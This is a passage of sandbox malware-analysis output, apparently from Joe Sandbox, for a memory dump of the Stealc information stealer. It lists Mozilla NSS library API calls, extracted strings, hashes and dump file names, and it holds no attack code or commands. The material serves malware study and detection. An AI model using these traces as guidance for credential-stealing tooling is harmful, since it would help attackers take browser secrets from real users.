                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1304971872-0
                                                                                                                                                                            • Opcode ID: b853aa4a77ce4eb60f6e5562fda9b4e1089b089f1fd53af98d10591d93468433
                                                                                                                                                                            • Instruction ID: aaec9fbfe67ceb3a75199564661fed15c9d9817f87eb58d1a7817c9c66d0f463
                                                                                                                                                                            • Opcode Fuzzy Hash: b853aa4a77ce4eb60f6e5562fda9b4e1089b089f1fd53af98d10591d93468433
                                                                                                                                                                            • Instruction Fuzzy Hash: 66B16FB0E0121E9FDF20DBA9DA44B9E7BB4AF09359F260D25E815E7600E731F914CB61
                                                                                                                                                                            APIs
                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6C8D4C4C
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C8D4C60
                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C8D4CA1
                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C8D4CBE
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C8D4CD2
                                                                                                                                                                            • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8D4D3A
                                                                                                                                                                            • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8D4D4F
                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C8D4DB7
                                                                                                                                                                              • Part of subcall function 6C93DD70: TlsGetValue.KERNEL32 ref: 6C93DD8C
                                                                                                                                                                              • Part of subcall function 6C93DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C93DDB4
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C81204A), ref: 6C8807AD
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C81204A), ref: 6C8807CD
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C81204A), ref: 6C8807D6
                                                                                                                                                                              • Part of subcall function 6C8807A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C81204A), ref: 6C8807E4
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,6C81204A), ref: 6C880864
                                                                                                                                                                              • Part of subcall function 6C8807A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C880880
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,?,6C81204A), ref: 6C8808CB
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsGetValue.KERNEL32(?,?,6C81204A), ref: 6C8808D7
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsGetValue.KERNEL32(?,?,6C81204A), ref: 6C8808FB
                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6C8D4DD7
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C8D4DEC
                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6C8D4E1B
                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6C8D4E2F
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8D4E5A
                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6C8D4E71
                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6C8D4E7A
                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6C8D4EA2
                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6C8D4EC1
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C8D4ED6
                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6C8D4F01
                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6C8D4F2A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 759471828-0
                                                                                                                                                                            • Opcode ID: 47394a075bb13a6738a236cb680b8694520724aea01e7dc7950b77ad99ce2948
                                                                                                                                                                            • Instruction ID: 857bd85f93d1cefaa67306aaeda78e00f1ac25817594fcce035de87d7683ee45
                                                                                                                                                                            • Opcode Fuzzy Hash: 47394a075bb13a6738a236cb680b8694520724aea01e7dc7950b77ad99ce2948
                                                                                                                                                                            • Instruction Fuzzy Hash: 7AB13475A042069FDB10EF68E984AAA77B4BF89318F164924EC1597B01EB30F964CBD1
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C926BF7), ref: 6C926EB6
                                                                                                                                                                              • Part of subcall function 6C881240: TlsGetValue.KERNEL32(00000040,?,6C88116C,NSPR_LOG_MODULES), ref: 6C881267
                                                                                                                                                                              • Part of subcall function 6C881240: EnterCriticalSection.KERNEL32(?,?,?,6C88116C,NSPR_LOG_MODULES), ref: 6C88127C
                                                                                                                                                                              • Part of subcall function 6C881240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C88116C,NSPR_LOG_MODULES), ref: 6C881291
                                                                                                                                                                              • Part of subcall function 6C881240: PR_Unlock.NSS3(?,?,?,?,6C88116C,NSPR_LOG_MODULES), ref: 6C8812A0
                                                                                                                                                                            • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C9CFC0A,6C926BF7), ref: 6C926ECD
                                                                                                                                                                            • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C926EE0
                                                                                                                                                                            • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C926EFC
                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6C926F04
                                                                                                                                                                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C926F18
                                                                                                                                                                            • PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C926BF7), ref: 6C926F30
                                                                                                                                                                            • PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C926BF7), ref: 6C926F54
                                                                                                                                                                            • PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C926BF7), ref: 6C926FE0
                                                                                                                                                                            • PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C926BF7), ref: 6C926FFD
                                                                                                                                                                            Strings
                                                                                                                                                                            • NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C926FDB
                                                                                                                                                                            • # SSL/TLS secrets log file, generated by NSS, xrefs: 6C926EF7
                                                                                                                                                                            • NSS_SSL_CBC_RANDOM_IV, xrefs: 6C926FF8
                                                                                                                                                                            • SSLKEYLOGFILE, xrefs: 6C926EB1
                                                                                                                                                                            • NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C926F4F
                                                                                                                                                                            • SSLFORCELOCKS, xrefs: 6C926F2B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
                                                                                                                                                                            • String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
                                                                                                                                                                            • API String ID: 412497378-2352201381
                                                                                                                                                                            • Opcode ID: 4b297c374b6d96d03faa7aff4f591da2b7a86ad3271e991fc879cb8f9f5da9e3
                                                                                                                                                                            • Instruction ID: 5e25eaed3a02de20630d7f9d03bf125ea78b3e8e67bcc91252e1514cebf636fc
                                                                                                                                                                            • Opcode Fuzzy Hash: 4b297c374b6d96d03faa7aff4f591da2b7a86ad3271e991fc879cb8f9f5da9e3
                                                                                                                                                                            • Instruction Fuzzy Hash: BEA127B2A7998086EB10463CEC0039437E9AB93329F684365E8B5D7EDCDB7DE450C352
                                                                                                                                                                            APIs
                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8A5DEC
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6C8A5E0F
                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(00000828), ref: 6C8A5E35
                                                                                                                                                                            • SECKEY_CopyPublicKey.NSS3(?), ref: 6C8A5E6A
                                                                                                                                                                            • HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6C8A5EC3
                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6C8A5ED9
                                                                                                                                                                            • SECKEY_SignatureLen.NSS3(?), ref: 6C8A5F09
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6C8A5F49
                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C8A5F89
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C8A5FA0
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C8A5FB6
                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6C8A5FBF
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C8A600C
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C8A6079
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8A6084
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8A6094
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2310191401-3916222277
                                                                                                                                                                            • Opcode ID: 50b35f9aaccf0e27d5b492b7078d1805c8a9b6cbe53a88519845c10d323d9d8c
                                                                                                                                                                            • Instruction ID: ad29edfe5ee1585c3257153c22ba6da458fa5297760c413225ea944a5d6a5514
                                                                                                                                                                            • Opcode Fuzzy Hash: 50b35f9aaccf0e27d5b492b7078d1805c8a9b6cbe53a88519845c10d323d9d8c
                                                                                                                                                                            • Instruction Fuzzy Hash: 978119B1E007059BDF30CAA8CE80B9E77B4AF48318F144928E819E7B51E730E996C7D1
                                                                                                                                                                            APIs
                                                                                                                                                                            • calloc.MOZGLUE(00000001,00000080), ref: 6C9A9C70
                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6C9A9C85
                                                                                                                                                                              • Part of subcall function 6C9598D0: calloc.MOZGLUE(00000001,00000084,6C880936,00000001,?,6C88102C), ref: 6C9598E5
                                                                                                                                                                            • PR_NewCondVar.NSS3(00000000), ref: 6C9A9C96
                                                                                                                                                                              • Part of subcall function 6C87BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C8821BC), ref: 6C87BB8C
                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6C9A9CA9
                                                                                                                                                                              • Part of subcall function 6C9598D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C959946
                                                                                                                                                                              • Part of subcall function 6C9598D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C8116B7,00000000), ref: 6C95994E
                                                                                                                                                                              • Part of subcall function 6C9598D0: free.MOZGLUE(00000000), ref: 6C95995E
                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6C9A9CB9
                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6C9A9CC9
                                                                                                                                                                            • PR_NewCondVar.NSS3(00000000), ref: 6C9A9CDA
                                                                                                                                                                              • Part of subcall function 6C87BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C87BBEB
                                                                                                                                                                              • Part of subcall function 6C87BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C87BBFB
                                                                                                                                                                              • Part of subcall function 6C87BB80: GetLastError.KERNEL32 ref: 6C87BC03
                                                                                                                                                                              • Part of subcall function 6C87BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C87BC19
                                                                                                                                                                              • Part of subcall function 6C87BB80: free.MOZGLUE(00000000), ref: 6C87BC22
                                                                                                                                                                            • PR_NewCondVar.NSS3(?), ref: 6C9A9CF0
                                                                                                                                                                            • PR_NewPollableEvent.NSS3 ref: 6C9A9D03
                                                                                                                                                                              • Part of subcall function 6C99F3B0: PR_CallOnce.NSS3(6C9F14B0,6C99F510), ref: 6C99F3E6
                                                                                                                                                                              • Part of subcall function 6C99F3B0: PR_CreateIOLayerStub.NSS3(6C9F006C), ref: 6C99F402
                                                                                                                                                                              • Part of subcall function 6C99F3B0: PR_Malloc.NSS3(00000004), ref: 6C99F416
                                                                                                                                                                              • Part of subcall function 6C99F3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6C99F42D
                                                                                                                                                                              • Part of subcall function 6C99F3B0: PR_SetSocketOption.NSS3(?), ref: 6C99F455
                                                                                                                                                                              • Part of subcall function 6C99F3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6C99F473
                                                                                                                                                                              • Part of subcall function 6C959890: TlsGetValue.KERNEL32(?,?,?,6C9597EB), ref: 6C95989E
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C9A9D78
                                                                                                                                                                            • calloc.MOZGLUE(00000001,0000000C), ref: 6C9A9DAF
                                                                                                                                                                            • _PR_CreateThread.NSS3(00000000,6C9A9EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6C9A9D9F
                                                                                                                                                                              • Part of subcall function 6C87B3C0: TlsGetValue.KERNEL32 ref: 6C87B403
                                                                                                                                                                              • Part of subcall function 6C87B3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6C87B459
                                                                                                                                                                            • _PR_CreateThread.NSS3(00000000,6C9AA060,00000000,00000001,00000001,00000000,?,00000000), ref: 6C9A9DE8
                                                                                                                                                                            • calloc.MOZGLUE(00000001,0000000C), ref: 6C9A9DFC
                                                                                                                                                                            • _PR_CreateThread.NSS3(00000000,6C9AA530,00000000,00000001,00000001,00000000,?,00000000), ref: 6C9A9E29
                                                                                                                                                                            • calloc.MOZGLUE(00000001,0000000C), ref: 6C9A9E3D
                                                                                                                                                                            • _PR_MD_UNLOCK.NSS3(?), ref: 6C9A9E71
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE890,00000000), ref: 6C9A9E89
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4254102231-0
                                                                                                                                                                            • Opcode ID: b8f19b66221883eb4052ccd7dda875552095939c0e4151d4fdd8f267bb9563ad
                                                                                                                                                                            • Instruction ID: 37278457bf464d06a8f09836b2c96a9da6d2c323717e87bcd33bcd8255607389
                                                                                                                                                                            • Opcode Fuzzy Hash: b8f19b66221883eb4052ccd7dda875552095939c0e4151d4fdd8f267bb9563ad
                                                                                                                                                                            • Instruction Fuzzy Hash: 696150B1A00706AFE710DF79C844A6BBBF8FF18208B154539E859C7B51EB31E855CBA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C8E8E01,00000000,6C8E9060,6C9F0B64), ref: 6C8E8E7B
                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C8E8E01,00000000,6C8E9060,6C9F0B64), ref: 6C8E8E9E
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(6C9F0B64,00000001,?,?,?,?,6C8E8E01,00000000,6C8E9060,6C9F0B64), ref: 6C8E8EAD
                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C8E8E01,00000000,6C8E9060,6C9F0B64), ref: 6C8E8EC3
                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C8E8E01,00000000,6C8E9060,6C9F0B64), ref: 6C8E8ED8
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C8E8E01,00000000,6C8E9060,6C9F0B64), ref: 6C8E8EE5
                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C8E8E01), ref: 6C8E8EFB
                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C9F0B64,6C9F0B64), ref: 6C8E8F11
                                                                                                                                                                            • PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C8E8F3F
                                                                                                                                                                              • Part of subcall function 6C8EA110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C8EA421,00000000,00000000,6C8E9826), ref: 6C8EA136
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C8E904A
                                                                                                                                                                            Strings
                                                                                                                                                                            • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C8E8E76
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
                                                                                                                                                                            • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
                                                                                                                                                                            • API String ID: 977052965-1032500510
                                                                                                                                                                            • Opcode ID: e804eb827a8f390317b9f25de55db4ff9d8148711ca23e69d9e8b90524aa8c5b
                                                                                                                                                                            • Instruction ID: a6c14f228868ce4875c2f841697e90f7f676541a57a4f00ed8940f2be6a77fcf
                                                                                                                                                                            • Opcode Fuzzy Hash: e804eb827a8f390317b9f25de55db4ff9d8148711ca23e69d9e8b90524aa8c5b
                                                                                                                                                                            • Instruction Fuzzy Hash: DE6191B5D0111A9BDB20CF55DD80AEFB7B5EF99358F144928DC18A7700E732E916CBA0
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C898E5B
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE007,00000000), ref: 6C898E81
                                                                                                                                                                            • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C898EED
                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C9C18D0,?), ref: 6C898F03
                                                                                                                                                                            • PR_CallOnce.NSS3(6C9F2AA4,6C8F12D0), ref: 6C898F19
                                                                                                                                                                            • PL_FreeArenaPool.NSS3(?), ref: 6C898F2B
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C898F53
                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C898F65
                                                                                                                                                                            • PL_FinishArenaPool.NSS3(?), ref: 6C898FA1
                                                                                                                                                                            • SECITEM_DupItem_Util.NSS3(?), ref: 6C898FFE
                                                                                                                                                                            • PR_CallOnce.NSS3(6C9F2AA4,6C8F12D0), ref: 6C899012
                                                                                                                                                                            • PL_FreeArenaPool.NSS3(?), ref: 6C899024
                                                                                                                                                                            • PL_FinishArenaPool.NSS3(?), ref: 6C89902C
                                                                                                                                                                            • PORT_DestroyCheapArena.NSS3(?), ref: 6C89903E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
                                                                                                                                                                            • String ID: security
                                                                                                                                                                            • API String ID: 3512696800-3315324353
                                                                                                                                                                            • Opcode ID: 0a089ff522d8232af53140fd34334c65618c873eb62142d83a236fff19e18e9e
                                                                                                                                                                            • Instruction ID: fde2608101a9635a0e2d0e2b3602b8e253505c60402871ae9b9e86ede0599d3b
                                                                                                                                                                            • Opcode Fuzzy Hash: 0a089ff522d8232af53140fd34334c65618c873eb62142d83a236fff19e18e9e
                                                                                                                                                                            • Instruction Fuzzy Hash: D15136B1608301ABD7309A5DDE41BAF73A8ABD679CF440C2EF46997B40E731D9098753
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C95CC7B), ref: 6C95CD7A
                                                                                                                                                                              • Part of subcall function 6C95CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C8CC1A8,?), ref: 6C95CE92
                                                                                                                                                                            • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C95CDA5
                                                                                                                                                                            • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C95CDB8
                                                                                                                                                                            • PR_UnloadLibrary.NSS3(00000000), ref: 6C95CDDB
                                                                                                                                                                            • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C95CD8E
                                                                                                                                                                              • Part of subcall function 6C8805C0: PR_EnterMonitor.NSS3 ref: 6C8805D1
                                                                                                                                                                              • Part of subcall function 6C8805C0: PR_ExitMonitor.NSS3 ref: 6C8805EA
                                                                                                                                                                            • PR_LoadLibrary.NSS3(wship6.dll), ref: 6C95CDE8
                                                                                                                                                                            • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C95CDFF
                                                                                                                                                                            • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C95CE16
                                                                                                                                                                            • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C95CE29
                                                                                                                                                                            • PR_UnloadLibrary.NSS3(00000000), ref: 6C95CE48
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
